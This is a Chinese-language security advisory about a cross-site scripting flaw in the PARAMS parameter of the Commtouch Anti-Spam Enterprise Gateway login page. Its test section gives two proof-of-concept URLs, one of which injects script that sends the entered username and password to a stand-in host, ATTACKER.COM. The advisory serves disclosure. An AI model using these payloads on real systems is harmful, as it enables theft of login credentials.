安全研究

安全漏洞
Commtouch反垃圾邮件企业网关PARAMS参数跨站脚本漏洞

发布日期:2008-06-26
更新日期:2008-06-27

受影响系统:
Commtouch Anti-Spam Enterprise Gateway 5
Commtouch Anti-Spam Enterprise Gateway 4
描述:
BUGTRAQ  ID: 29957

Commtouch Anti-Spam是由以色列Commtouch公司开发的企业级垃圾邮件防护平台。

Commtouch Anti-Spam产品向用户定期发送邮件报告,列出所阻断的可疑垃圾邮件,然后用户可以在邮件中点击相关链接确认是否应放行可疑邮件。点击链接后,用户会被定向到一个登录页面,而这个登录页面没有正确的过滤PARAMS参数。如果攻击者发送了包含有恶意链接的邮件消息的话,用户受骗点击了消息中的链接就会导致跨站脚本攻击。

<*来源:Erez Metula (erezmetula@2bsecure.co.il
  
  链接:http://marc.info/?l=full-disclosure&m=121449213428063&q=p5
        http://secunia.com/advisories/30876/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD </SCRIPT><input%20type="hidden"%20name="XXX"%20value="X
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function SendCredentials(){ img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid=" + document.forms[0].LoginName.value + "&amp;password=" + document.forms[0].LoginPass.value;} function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload = HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x

建议:
厂商补丁:

Commtouch
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.commtouch.com/

浏览次数:3521
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障